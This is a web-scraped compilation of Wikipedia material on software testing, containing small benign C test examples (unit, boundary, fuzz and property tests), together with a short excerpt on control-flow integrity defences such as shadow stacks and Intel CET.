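    printf("static revenue estimate:  %.1f\n", static_estimate);
    printf("dynamic revenue estimate: %.1f\n", dynamic_estimate);
    return 0;
}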
https://en.wikipedia.org/wiki/Dynamic_analysis
Software testing is the act of checking whether software satisfies expectations. Software testing can provide objective, independent information about the quality of software and the risk of its failure to a user or sponsor.[1] Software testing can determine the correctness of software for specific scenarios but cannot determine correctness for all scenarios.[2][3] It cannot find all bugs. Based on criteria for measuring correctness from an oracle, software testing employs principles and mechanisms that might recognize a problem. Examples of oracles include specifications, contracts,[4] comparable products, past versions of the same product, inferences about intended or expected purpose, user or customer expectations, relevant standards, and applicable laws. Software testing is often dynamic in nature: running the software to verify that actual output matches expected output. It can also be static in nature: reviewing code and its associated documentation. Software testing is often used to answer the question: Does the software do what it is supposed to do and what it needs to do? Information learned from software testing may be used to improve the process by which software is developed.[5]: 41–43 Software testing is often organized as a "pyramid", in which most tests are unit tests, followed by integration tests, with end-to-end (e2e) tests making up the smallest proportion.[6][7][8] A study conducted by NIST in 2002 reported that software bugs cost the U.S. economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing were performed.[9][dubious–discuss] Outsourcing software testing because of costs is very common, with China, the Philippines, and India being preferred destinations.[citation needed] Glenford J. Myers initially introduced the separation of debugging from testing in 1979.[10] Although his attention was on breakage testing ("A successful test case is one that detects an as-yet undiscovered error."[10]: 16), it illustrated the desire of the software engineering community to separate fundamental development activities, such as debugging, from verification. Software testing is typically goal driven. Software testing typically includes handling software bugs – a defect in the code that causes an undesirable result.[11]: 31 Bugs generally slow testing progress and involve programmer assistance to debug and fix. Not all defects cause a failure. For example, a defect in dead code will not be considered a failure. A defect that does not cause failure at one point in time may lead to failure later due to environmental changes. Examples of environment change include running on new computer hardware, changes in data, and interacting with different software.[12] A single defect may result in multiple failure symptoms. Software testing may reveal a requirements gap – the omission of a requirement from the design.[5]: 426 Requirement gaps can often be non-functional requirements such as testability, scalability, maintainability, performance, and security. A fundamental limitation of software testing is that testing under all combinations of inputs and preconditions (initial state) is not feasible, even with a simple product.[3]: 17–18[13] Defects that manifest in unusual conditions are difficult to find in testing. Also, non-functional dimensions of quality (how it is supposed to be versus what it is supposed to do) – usability, scalability, performance, compatibility, and reliability – can be subjective; something that constitutes sufficient value to one person may not do so for another. 
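As a concrete anchor for the unit tests that form the base of the "pyramid" mentioned above, the following is a minimal sketch in C; the clamp function and its expected values are hypothetical, chosen only to show a small unit being checked against an oracle derived from its specification.

#include <assert.h>
#include <stdio.h>

/* Hypothetical unit under test: clamp x into the inclusive range [lo, hi]. */
static int clamp(int x, int lo, int hi) {
    if (x < lo) return lo;
    if (x > hi) return hi;
    return x;
}

int main(void) {
    /* Each assertion compares actual output against the specified expectation. */
    assert(clamp(5, 0, 10) == 5);    /* inside the range: unchanged */
    assert(clamp(-3, 0, 10) == 0);   /* below the range: pinned to lo */
    assert(clamp(42, 0, 10) == 10);  /* above the range: pinned to hi */
    assert(clamp(0, 0, 10) == 0);    /* boundary values are preserved */
    assert(clamp(10, 0, 10) == 10);
    puts("all unit tests passed");
    return 0;
}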
Although testing for every possible input is not feasible, testing can use combinatorics to maximize coverage while minimizing tests.[14] Testing can be categorized many ways.[15] Software testing can be categorized into levels based on how much of the software system is the focus of a test.[18][19][20][21] There are many approaches to software testing. Reviews, walkthroughs, or inspections are referred to as static testing, whereas executing programmed code with a given set of test cases is referred to as dynamic testing.[23][24] Static testing is often implicit, as with proofreading, or occurs when programming tools or text editors check source code structure, or when compilers (or pre-compilers) check syntax and data flow as static program analysis. Dynamic testing takes place when the program itself is run. Dynamic testing may begin before the program is 100% complete in order to test particular sections of code, and can be applied to discrete functions or modules.[23][24] Typical techniques for this are either using stubs/drivers or execution from a debugger environment.[24] Static testing involves verification, whereas dynamic testing also involves validation.[24] Passive testing means verifying the system's behavior without any interaction with the software product. Contrary to active testing, testers do not provide any test data but look at system logs and traces. They mine for patterns and specific behavior in order to make some kinds of decisions.[25] This is related to offline runtime verification and log analysis. The type of testing strategy to be performed depends on whether the tests to be applied to the implementation under test (IUT) should be decided before the testing plan starts to be executed (preset testing[28]) or whether each input to be applied to the IUT can be dynamically dependent on the outputs obtained during the application of the previous tests (adaptive testing[29][30]). Software testing can often be divided into white-box and black-box. These two approaches are used to describe the point of view that the tester takes when designing test cases. A hybrid approach called grey-box, which includes aspects of both, may also be applied to software testing methodology.[31][32] White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) verifies the internal structures or workings of a program, as opposed to the functionality exposed to the end-user. In white-box testing, an internal perspective of the system (the source code), as well as programming skills, are used to design test cases. The tester chooses inputs to exercise paths through the code and determines the appropriate outputs.[31][32] This is analogous to testing nodes in a circuit, e.g., in-circuit testing (ICT). While white-box testing can be applied at the unit, integration, and system levels of the software testing process, it is usually done at the unit level.[33] It can test paths within a unit, paths between units during integration, and between subsystems during a system-level test. Though this method of test design can uncover many errors or problems, it might not detect unimplemented parts of the specification or missing requirements. Techniques used in white-box testing include:[32][34] Code coverage tools can evaluate the completeness of a test suite that was created with any method, including black-box testing. 
This allows the software team to examine parts of a system that are rarely tested and ensures that the most importantfunction pointshave been tested.[35]Code coverage as asoftware metriccan be reported as a percentage for:[31][35][36] 100% statement coverage ensures that all code paths or branches (in terms ofcontrol flow) are executed at least once. This is helpful in ensuring correct functionality, but not sufficient since the same code may process different inputs correctly or incorrectly.[37] Black-box testing (also known as functional testing) describes designing test cases without knowledge of the implementation, without reading the source code. The testers are only aware of what the software is supposed to do, not how it does it.[38]Black-box testing methods include:equivalence partitioning,boundary value analysis,all-pairs testing,state transition tables,decision tabletesting,fuzz testing,model-based testing,use casetesting,exploratory testing, and specification-based testing.[31][32][36] Specification-based testing aims to test the functionality of software according to the applicable requirements.[39]This level of testing usually requires thoroughtest casesto be provided to the tester, who then can simply verify that for a given input, the output value (or behavior), either "is" or "is not" the same as the expected value specified in the test case. Test cases are built around specifications and requirements, i.e., what the application is supposed to do. It uses external descriptions of the software, including specifications, requirements, and designs, to derive test cases. These tests can befunctionalornon-functional, though usually functional. Specification-based testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations.[40] Black box testing can be used to any level of testing although usually not at the unit level.[33] Component interface testing Component interface testing is a variation ofblack-box testing, with the focus on the data values beyond just the related actions of a subsystem component.[41]The practice of component interface testing can be used to check the handling of data passed between various units, or subsystem components, beyond full integration testing between those units.[42][43]The data being passed can be considered as "message packets" and the range or data types can be checked for data generated from one unit and tested for validity before being passed into another unit. One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values.[42]Unusual data values in an interface can help explain unexpected performance in the next unit. The aim of visual testing is to provide developers with the ability to examine what was happening at the point of software failure by presenting the data in such a way that the developer can easily find the information he or she requires, and the information is expressed clearly.[44][45] At the core of visual testing is the idea that showing someone a problem (or a test failure), rather than just describing it, greatly increases clarity and understanding. 
Visual testing, therefore, requires the recording of the entire test process – capturing everything that occurs on the test system in video format. Output videos are supplemented by real-time tester input via picture-in-a-picture webcam and audio commentary from microphones. Visual testing provides a number of advantages. The quality of communication is increased drastically because testers can show the problem (and the events leading up to it) to the developer as opposed to just describing it, and the need to replicate test failures will cease to exist in many cases. The developer will have all the evidence he or she requires of a test failure and can instead focus on the cause of the fault and how it should be fixed. Ad hoc testingandexploratory testingare important methodologies for checking software integrity because they require less preparation time to implement, while the important bugs can be found quickly.[46]In ad hoc testing, where testing takes place in an improvised impromptu way, the ability of the tester(s) to base testing off documented methods and then improvise variations of those tests can result in a more rigorous examination of defect fixes.[46]However, unless strict documentation of the procedures is maintained, one of the limits of ad hoc testing is lack of repeatability.[46] Grey-box testing (American spelling: gray-box testing) involves using knowledge of internal data structures and algorithms for purposes of designing tests while executing those tests at the user, or black-box level. The tester will often have access to both "the source code and the executable binary."[47]Grey-box testing may also includereverse engineering(using dynamic code analysis) to determine, for instance, boundary values or error messages.[47]Manipulating input data and formatting output do not qualify as grey-box, as the input and output are clearly outside of the "black box" that we are calling the system under test. This distinction is particularly important when conductingintegration testingbetween two modules of code written by two different developers, where only the interfaces are exposed for the test. By knowing the underlying concepts of how the software works, the tester makes better-informed testing choices while testing the software from outside. Typically, a grey-box tester will be permitted to set up an isolated testing environment with activities, such as seeding adatabase. The tester can observe the state of the product being tested after performing certain actions such as executingSQLstatements against the database and then executing queries to ensure that the expected changes have been reflected. Grey-box testing implements intelligent test scenarios based on limited information. This will particularly apply to data type handling,exception handling, and so on.[48] With the concept of grey-box testing, this "arbitrary distinction" between black- and white-box testing has faded somewhat.[33] Most software systems have installation procedures that are needed before they can be used for their main purpose. Testing these procedures to achieve an installed software system that may be used is known asinstallation testing.[49]: 139These procedures may involve full or partial upgrades, and install/uninstall processes. 
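Returning to the grey-box approach described above, the following hedged sketch in C shows how knowledge of an internal detail (here, an assumed 16-byte internal buffer) guides the choice of boundary-length inputs while the test still exercises only the public interface; the store_name function and its limit are hypothetical.

#include <assert.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX 16   /* internal detail known to the grey-box tester */

/* Hypothetical unit under test: copy a name into a 16-byte buffer,
   truncating if necessary, and return the number of characters kept. */
static size_t store_name(const char *name, char out[NAME_MAX]) {
    size_t n = strlen(name);
    if (n > NAME_MAX - 1) n = NAME_MAX - 1;   /* leave room for the terminator */
    memcpy(out, name, n);
    out[n] = '\0';
    return n;
}

int main(void) {
    char buf[NAME_MAX];
    /* Boundary-length inputs chosen because the tester knows the internal limit. */
    assert(store_name("short", buf) == 5 && strcmp(buf, "short") == 0);
    assert(store_name("exactly15chars!", buf) == 15);    /* fits exactly */
    assert(store_name("sixteen__chars!!", buf) == 15);   /* one byte too long: truncated */
    assert(buf[NAME_MAX - 1] == '\0');                   /* always null-terminated */
    puts("grey-box boundary tests passed");
    return 0;
}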
A common cause of software failure (real or perceived) is a lack of itscompatibilitywith otherapplication software,operating systems(or operating systemversions, old or new), or target environments that differ greatly from the original (such as aterminalorGUIapplication intended to be run on thedesktopnow being required to become aWeb application, which must render in aWeb browser). For example, in the case of a lack ofbackward compatibility, this can occur because the programmers develop and test software only on the latest version of the target environment, which not all users may be running. This results in the unintended consequence that the latest work may not function on earlier versions of the target environment, or on older hardware that earlier versions of the target environment were capable of using. Sometimes such issues can be fixed by proactivelyabstractingoperating system functionality into a separate programmoduleorlibrary. Sanity testingdetermines whether it is reasonable to proceed with further testing. Smoke testingconsists of minimal attempts to operate the software, designed to determine whether there are any basic problems that will prevent it from working at all. Such tests can be used asbuild verification test. Regression testing focuses on finding defects after a major code change has occurred. Specifically, it seeks to uncoversoftware regressions, as degraded or lost features, including old bugs that have come back. Such regressions occur whenever software functionality that was previously working correctly, stops working as intended. Typically, regressions occur as anunintended consequenceof program changes, when the newly developed part of the software collides with the previously existing code. Regression testing is typically the largest test effort in commercial software development,[50]due to checking numerous details in prior software features, and even new software can be developed while using some old test cases to test parts of the new design to ensure prior functionality is still supported. Common methods of regression testing include re-running previous sets of test cases and checking whether previously fixed faults have re-emerged. The depth of testing depends on the phase in the release process and theriskof the added features. They can either be complete, for changes added late in the release or deemed to be risky, or be very shallow, consisting of positive tests on each feature, if the changes are early in the release or deemed to be of low risk. Acceptance testing is system-level testing to ensure the software meets customer expectations.[51][52][53][54] Acceptance testing may be performed as part of the hand-off process between any two phases of development.[citation needed] Tests are frequently grouped into these levels by where they are performed in the software development process, or by the level of specificity of the test.[54] Sometimes, UAT is performed by the customer, in their environment and on their own hardware. OAT is used to conduct operational readiness (pre-release) of a product, service or system as part of aquality management system. OAT is a common type of non-functional software testing, used mainly insoftware developmentandsoftware maintenanceprojects. This type of testing focuses on the operational readiness of the system to be supported, or to become part of the production environment. 
Hence, it is also known as operational readiness testing (ORT) or operations readiness and assurance (OR&A) testing. Functional testing within OAT is limited to those tests that are required to verify the non-functional aspects of the system. In addition, testing should ensure that the system not only works as expected and is portable, but also does not damage or partially corrupt its operating environment or cause other processes within that environment to become inoperative.[55] Contractual acceptance testing is performed based on the contract's acceptance criteria defined during the agreement of the contract, while regulatory acceptance testing is performed based on the regulations relevant to the software product. Both of these tests can be performed by users or independent testers. Regulatory acceptance testing sometimes involves the regulatory agencies auditing the test results. Alpha testing is simulated or actual operational testing by potential users/customers or an independent test team at the developers' site. Alpha testing is often employed for off-the-shelf software as a form of internal acceptance testing before the software goes to beta testing.[56] Beta testing comes after alpha testing and can be considered a form of external user acceptance testing. Versions of the software, known as beta versions, are released to a limited audience outside of the programming team known as beta testers. The software is released to groups of people so that further testing can ensure the product has few faults or bugs. Beta versions can be made available to the open public to increase the feedback field to a maximal number of future users and to deliver value earlier, for an extended or even indefinite period of time (perpetual beta).[57] Functional testing refers to activities that verify a specific action or function of the code. These are usually found in the code requirements documentation, although some development methodologies work from use cases or user stories. Functional tests tend to answer the question of "can the user do this" or "does this particular feature work." Non-functional testing refers to aspects of the software that may not be related to a specific function or user action, such as scalability or other performance, behavior under certain constraints, or security. Testing will determine the breaking point, the point at which extremes of scalability or performance lead to unstable execution. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. Continuous testing is the process of executing automated tests as part of the software delivery pipeline to obtain immediate feedback on the business risks associated with a software release candidate.[58][59] Continuous testing includes the validation of both functional requirements and non-functional requirements; the scope of testing extends from validating bottom-up requirements or user stories to assessing the system requirements associated with overarching business goals.[60][61] Destructive testing attempts to cause the software or a sub-system to fail. It verifies that the software functions properly even when it receives invalid or unexpected inputs, thereby establishing the robustness of input validation and error-management routines.[citation needed] Software fault injection, in the form of fuzzing, is an example of failure testing. 
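As a rough illustration of fuzzing, the following sketch repeatedly feeds random printable strings to a parser and checks that it always produces one of its defined outcomes; the parse_record function, input format, and iteration count are hypothetical, and real coverage-guided fuzzers are far more capable than this simple random loop.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical unit under test: parse "key=value" into two fields.
   Returns 0 on success and -1 on malformed or oversized input. */
static int parse_record(const char *in, char key[32], char val[32]) {
    const char *eq = strchr(in, '=');
    if (eq == NULL || eq == in) return -1;
    size_t klen = (size_t)(eq - in);
    size_t vlen = strlen(eq + 1);
    if (klen >= 32 || vlen >= 32) return -1;
    memcpy(key, in, klen); key[klen] = '\0';
    memcpy(val, eq + 1, vlen); val[vlen] = '\0';
    return 0;
}

int main(void) {
    srand(12345);                         /* fixed seed keeps failures reproducible */
    for (int i = 0; i < 100000; i++) {
        char input[64];
        int len = rand() % 63;
        for (int j = 0; j < len; j++)
            input[j] = (char)(32 + rand() % 95);   /* random printable byte */
        input[len] = '\0';

        char key[32], val[32];
        int rc = parse_record(input, key, val);
        if (rc != 0 && rc != -1) {        /* the only outcomes the contract allows */
            fprintf(stderr, "unexpected return %d for input \"%s\"\n", rc, input);
            return 1;
        }
    }
    puts("fuzz run completed without failures");
    return 0;
}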
Various commercial non-functional testing tools are linked from the software fault injection page; there are also numerous open-source and free software tools available that perform destructive testing. Performance testing is generally executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage. Load testing is primarily concerned with testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number of users. This is generally referred to as software scalability. When load testing is performed as a non-functional activity, it is often referred to as endurance testing. Volume testing is a way to test software functions even when certain components (for example a file or database) increase radically in size. Stress testing is a way to test reliability under unexpected or rare workloads. Stability testing (often referred to as load or endurance testing) checks whether the software can continue to function well during or beyond an acceptable period. There is little agreement on what the specific goals of performance testing are. The terms load testing, performance testing, scalability testing, and volume testing are often used interchangeably. Real-time software systems have strict timing constraints. To test whether timing constraints are met, real-time testing is used. Usability testing checks whether the user interface is easy to use and understand. It is concerned mainly with the use of the application. This is not a kind of testing that can be automated; actual human users are needed, monitored by skilled UI designers. Usability testing can use structured models to check how well an interface works. The Stanton, Theofanos, and Joshi (2015) model looks at user experience, and the Al-Sharafat and Qadoumi (2016) model is for expert evaluation, helping to assess usability in digital applications.[62] Accessibility testing is done to ensure that the software is accessible to persons with disabilities. Several common web accessibility tests exist. Security testing is essential for software that processes confidential data to prevent system intrusion by hackers. The International Organization for Standardization (ISO) defines this as a "type of testing conducted to evaluate the degree to which a test item, and associated data and information, are protected so that unauthorised persons or systems cannot use, read or modify them, and authorized persons or systems are not denied access to them."[63] Testing for internationalization and localization validates that the software can be used with different languages and geographic regions. The process of pseudolocalization is used to test the ability of an application to be translated to another language, and to make it easier to identify when the localization process may introduce new bugs into the product. Globalization testing verifies that the software is adapted for a new culture, such as different currencies or time zones.[64] Actual translation to human languages must be tested, too. A variety of localization and globalization failures are possible. Development testing is a software development process that involves the synchronized application of a broad spectrum of defect prevention and detection strategies in order to reduce software development risks, time, and costs. 
It is performed by the software developer or engineer during the construction phase of the software development lifecycle. Development testing aims to eliminate construction errors before code is promoted to other testing; this strategy is intended to increase the quality of the resulting software as well as the efficiency of the overall development process. Depending on the organization's expectations for software development, development testing might include static code analysis, data flow analysis, metrics analysis, peer code reviews, unit testing, code coverage analysis, traceability, and other software testing practices. A/B testing is a method of running a controlled experiment to determine if a proposed change is more effective than the current approach. Customers are routed to either a current version (control) of a feature, or to a modified version (treatment), and data is collected to determine which version is better at achieving the desired outcome. Concurrent or concurrency testing assesses the behaviour and performance of software and systems that use concurrent computing, generally under normal usage conditions. Typical problems this type of testing will expose are deadlocks, race conditions and problems with shared memory/resource handling. In software testing, conformance testing verifies that a product performs according to its specified standards. Compilers, for instance, are extensively tested to determine whether they meet the recognized standard for that language. Creating a display of expected output, whether as a data comparison of text or screenshots of the UI,[3]: 195 is sometimes called snapshot testing or Golden Master Testing. Unlike many other forms of testing, this cannot detect failures automatically and instead requires that a human evaluate the output for inconsistencies. Property testing is a testing technique where, instead of asserting that specific inputs produce specific expected outputs, the practitioner randomly generates many inputs, runs the program on all of them, and asserts the truth of some "property" that should be true for every pair of input and output. For example, every output from a serialization function should be accepted by the corresponding deserialization function, and every output from a sort function should be a monotonically increasing list containing exactly the same elements as its input. Property testing libraries allow the user to control the strategy by which random inputs are constructed, to ensure coverage of degenerate cases, or inputs featuring specific patterns that are needed to fully exercise aspects of the implementation under test. Property testing is also sometimes known as "generative testing" or "QuickCheck testing" since it was introduced and popularized by the Haskell library QuickCheck.[65] Metamorphic testing (MT) is a property-based software testing technique, which can be an effective approach for addressing the test oracle problem and the test case generation problem. The test oracle problem is the difficulty of determining the expected outcomes of selected test cases or of determining whether the actual outputs agree with the expected outcomes. VCR testing, also known as "playback testing" or "record/replay" testing, is a testing technique for increasing the reliability and speed of regression tests that involve a component that is slow or unreliable to communicate with, often a third-party API outside of the tester's control. 
It involves making a recording ("cassette") of the system's interactions with the external component, and then replaying the recorded interactions as a substitute for communicating with the external system on subsequent runs of the test. The technique was popularized in web development by the Ruby libraryvcr. In an organization, testers may be in a separate team from the rest of thesoftware developmentteam or they may be integrated into one team. Software testing can also be performed by non-dedicated software testers. In the 1980s, the termsoftware testerstarted to be used to denote a separate profession. Notable software testing roles and titles include:[66]test manager,test lead,test analyst,test designer,tester,automation developer, andtest administrator.[67] Organizations that develop software, perform testing differently, but there are common patterns.[2] Inwaterfall development, testing is generally performed after the code is completed, but before the product is shipped to the customer.[68]This practice often results in the testing phase being used as aprojectbuffer to compensate for project delays, thereby compromising the time devoted to testing.[10]: 145–146 Some contend that the waterfall process allows for testing to start when the development project starts and to be a continuous process until the project finishes.[69] Agile software developmentcommonly involves testing while the code is being written and organizing teams with both programmers and testers and with team members performing both programming and testing. One agile practice,test-driven software development(TDD), is a way ofunit testingsuch that unit-level testing is performed while writing the product code.[70]Test code is updated as new features are added and failure conditions are discovered (bugs fixed). Commonly, the unit test code is maintained with the project code, integrated in the build process, and run on each build and as part of regression testing. Goals of thiscontinuous integrationis to support development and reduce defects.[71][70] Even in organizations that separate teams by programming and testing functions, many often have the programmers performunit testing.[72] The sample below is common for waterfall development. The same activities are commonly found in other development models, but might be described differently. Software testing is used in association withverification and validation:[73] The terms verification and validation are commonly used interchangeably in the industry; it is also common to see these two terms defined with contradictory definitions. According to theIEEE StandardGlossary of Software Engineering Terminology:[11]: 80–81 And, according to the ISO 9000 standard: The contradiction is caused by the use of the concepts of requirements and specified requirements but with different meanings. In the case of IEEE standards, the specified requirements, mentioned in the definition of validation, are the set of problems, needs and wants of the stakeholders that the software must solve and satisfy. Such requirements are documented in a Software Requirements Specification (SRS). And, the products mentioned in the definition of verification, are the output artifacts of every phase of the software development process. These products are, in fact, specifications such as Architectural Design Specification, Detailed Design Specification, etc. The SRS is also a specification, but it cannot be verified (at least not in the sense used here, more on this subject below). 
But, for the ISO 9000, the specified requirements are the set of specifications, as just mentioned above, that must be verified. A specification, as previously explained, is the product of a software development process phase that receives another specification as input. A specification is verified successfully when it correctly implements its input specification. All the specifications can be verified except the SRS because it is the first one (it can be validated, though). Examples: The Design Specification must implement the SRS; and, the Construction phase artifacts must implement the Design Specification. So, when these words are defined in common terms, the apparent contradiction disappears. Both the SRS and the software must be validated. The SRS can be validated statically by consulting with the stakeholders. Nevertheless, running some partial implementation of the software or a prototype of any kind (dynamic testing) and obtaining positive feedback from them, can further increase the certainty that the SRS is correctly formulated. On the other hand, the software, as a final and running product (not its artifacts and documents, including the source code) must be validated dynamically with the stakeholders by executing the software and having them to try it. Some might argue that, for SRS, the input is the words of stakeholders and, therefore, SRS validation is the same as SRS verification. Thinking this way is not advisable as it only causes more confusion. It is better to think of verification as a process involving a formal and technical input document. In some organizations, software testing is part of asoftware quality assurance(SQA) process.[3]: 347In SQA, software process specialists and auditors are concerned with the software development process rather than just the artifacts such as documentation, code and systems. They examine and change thesoftware engineeringprocess itself to reduce the number of faults that end up in the delivered software: the so-called defect rate. What constitutes an acceptable defect rate depends on the nature of the software; a flight simulator video game would have much higher defect tolerance than software for an actual airplane. Although there are close links with SQA, testing departments often exist independently, and there may be no SQA function in some companies.[citation needed] Software testing is an activity to investigate software under test in order to provide quality-related information to stakeholders. By contrast, QA (quality assurance) is the implementation of policies and procedures intended to prevent defects from reaching customers. Quality measures include such topics ascorrectness, completeness,securityandISO/IEC 9126requirements such as capability,reliability,efficiency,portability,maintainability, compatibility, andusability. There are a number of frequently usedsoftware metrics, or measures, which are used to assist in determining the state of the software or the adequacy of the testing. A software testing process can produce severalartifacts. The actual artifacts produced are a factor of the software development model used, stakeholder and organisational needs. Atest planis a document detailing the approach that will be taken for intended test activities. 
The plan may include aspects such as objectives, scope, processes and procedures, personnel requirements, and contingency plans.[51]The test plan could come in the form of a single plan that includes all test types (like an acceptance or system test plan) and planning considerations, or it may be issued as a master test plan that provides an overview of more than one detailed test plan (a plan of a plan).[51]A test plan can be, in some cases, part of a wide "test strategy" which documents overall testing approaches, which may itself be a master test plan or even a separate artifact. Atest casenormally consists of a unique identifier, requirement references from a design specification, preconditions, events, a series of steps (also known as actions) to follow, input, output, expected result, and the actual result. Clinically defined, a test case is an input and an expected result.[75]This can be as terse as "for condition x your derived result is y", although normally test cases describe in more detail the input scenario and what results might be expected. It can occasionally be a series of steps (but often steps are contained in a separate test procedure that can be exercised against multiple test cases, as a matter of economy) but with one expected result or expected outcome. The optional fields are a test case ID, test step, or order of execution number, related requirement(s), depth, test category, author, and check boxes for whether the test is automatable and has been automated. Larger test cases may also contain prerequisite states or steps, and descriptions. A test case should also contain a place for the actual result. These steps can be stored in a word processor document, spreadsheet, database, or other common repositories. In a database system, you may also be able to see past test results, who generated the results, and what system configuration was used to generate those results. These past results would usually be stored in a separate table. Atest scriptis a procedure or programming code that replicates user actions. Initially, the term was derived from the product of work created by automated regression test tools. A test case will be a baseline to create test scripts using a tool or a program. In most cases, multiple sets of values or data are used to test the same functionality of a particular feature. All the test values and changeable environmental components are collected in separate files and stored as test data. It is also useful to provide this data to the client and with the product or a project. There are techniques to generate Test data. The software, tools, samples of data input and output, and configurations are all referred to collectively as atest harness. A test run is a collection of test cases or test suites that the user is executing and comparing the expected with the actual results. Once complete, a report or all executed tests may be generated. Several certification programs exist to support the professional aspirations of software testers and quality assurance specialists. A few practitioners argue that the testing field is not ready for certification, as mentioned in thecontroversysection. Some of the majorsoftware testing controversiesinclude: It is commonly believed that the earlier a defect is found, the cheaper it is to fix it. 
The following table shows the cost of fixing the defect depending on the stage it was found.[85]For example, if a problem in the requirements is found only post-release, then it would cost 10–100 times more to fix than if it had already been found by the requirements review. With the advent of moderncontinuous deploymentpractices and cloud-based services, the cost of re-deployment and maintenance may lessen over time. The data from which this table is extrapolated is scant. Laurent Bossavit says in his analysis: The "smaller projects" curve turns out to be from only two teams of first-year students, a sample size so small that extrapolating to "smaller projects in general" is totally indefensible. The GTE study does not explain its data, other than to say it came from two projects, one large and one small. The paper cited for the Bell Labs "Safeguard" project specifically disclaims having collected the fine-grained data that Boehm's data points suggest. The IBM study (Fagan's paper) contains claims that seem to contradict Boehm's graph and no numerical results that clearly correspond to his data points. Boehm doesn't even cite a paper for the TRW data, except when writing for "Making Software" in 2010, and there he cited the original 1976 article. There exists a large study conducted at TRW at the right time for Boehm to cite it, but that paper doesn't contain the sort of data that would support Boehm's claims.[86]
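Setting aside cost estimates, the property testing approach described earlier in this section (for example, checking that a sort's output is ordered and preserves its input's elements) can be sketched without any special library; the insertion_sort function, value ranges, and trial count below are arbitrary choices for illustration, not the QuickCheck API.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical unit under test: a hand-written insertion sort. */
static void insertion_sort(int *a, int n) {
    for (int i = 1; i < n; i++) {
        int x = a[i], j = i - 1;
        while (j >= 0 && a[j] > x) { a[j + 1] = a[j]; j--; }
        a[j + 1] = x;
    }
}

int main(void) {
    srand(7);
    for (int trial = 0; trial < 10000; trial++) {
        int n = rand() % 50;
        int in[50], out[50], counts[10] = {0};
        for (int i = 0; i < n; i++) {
            in[i] = rand() % 10;          /* small value range keeps the count check simple */
            counts[in[i]]++;
        }
        memcpy(out, in, sizeof(int) * (size_t)n);
        insertion_sort(out, n);

        /* Property 1: the output is monotonically non-decreasing. */
        for (int i = 1; i < n; i++)
            if (out[i - 1] > out[i]) { puts("property violated: not sorted"); return 1; }
        /* Property 2: the output contains exactly the input's elements. */
        for (int i = 0; i < n; i++)
            counts[out[i]]--;
        for (int v = 0; v < 10; v++)
            if (counts[v] != 0) { puts("property violated: elements changed"); return 1; }
    }
    puts("all properties held for every random input");
    return 0;
}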
https://en.wikipedia.org/wiki/Software_testing#Limitations_of_testing
Control-flow integrity (CFI) is a general term for computer security techniques that prevent a wide variety of malware attacks from redirecting the flow of execution (the control flow) of a program. A computer program commonly changes its control flow to make decisions and use different parts of the code. Such transfers may be direct, in that the target address is written in the code itself, or indirect, in that the target address itself is a variable in memory or a CPU register. In a typical function call, the program performs a direct call, but returns to the caller function using the stack – an indirect backward-edge transfer. When a function pointer is called, such as from a virtual table, we say there is an indirect forward-edge transfer.[1][2] Attackers seek to inject code into a program to make use of its privileges or to extract data from its memory space. Before executable code was commonly made read-only, an attacker could arbitrarily change the code as it ran, targeting direct transfers or even dispensing with transfers altogether. After W^X became widespread, an attacker must instead redirect execution to a separate, unprotected area containing the code to be run, making use of indirect transfers: one could overwrite the virtual table for a forward-edge attack or change the call stack for a backward-edge attack (return-oriented programming). CFI is designed to protect indirect transfers from going to unintended locations.[1] Associated techniques include code-pointer separation (CPS), code-pointer integrity (CPI), stack canaries, shadow stacks, and vtable pointer verification.[3][4][5] These protections can be classified as either coarse-grained or fine-grained based on the number of targets restricted. A coarse-grained forward-edge CFI implementation could, for example, restrict the set of indirect call targets to any function that may be indirectly called in the program, while a fine-grained one would restrict each indirect call site to functions that have the same type as the function to be called. Similarly, for a backward-edge scheme protecting returns, a coarse-grained implementation would only allow the procedure to return to a function of the same type (of which there could be many, especially for common prototypes), while a fine-grained one would enforce precise return matching (so it can return only to the function that called it). Related implementations are available in Clang (LLVM in general),[6] Microsoft's Control Flow Guard[7][8][9] and Return Flow Guard,[10] Google's Indirect Function-Call Checks[11] and Reuse Attack Protector (RAP).[12][13] LLVM/Clang provides a "CFI" option that works on the forward edge by checking for errors in virtual tables and type casts. It depends on link-time optimization (LTO) to know what functions are supposed to be called in normal cases.[14] There is a separate "shadow call stack" scheme that defends on the backward edge by checking for call stack modifications, available only for aarch64.[15] Google has shipped Android with the Linux kernel compiled by Clang with link-time optimization (LTO) and CFI since 2018.[16] Shadow call stack (SCS) is available for the Linux kernel as an option, including on Android.[17] Intel Control-flow Enforcement Technology (CET) detects compromises to control flow integrity with a shadow stack (SS) and indirect branch tracking (IBT).[18][19] The kernel must map a region of memory for the shadow stack that is not writable by user-space programs except through special instructions. The shadow stack stores a copy of the return address of each CALL. 
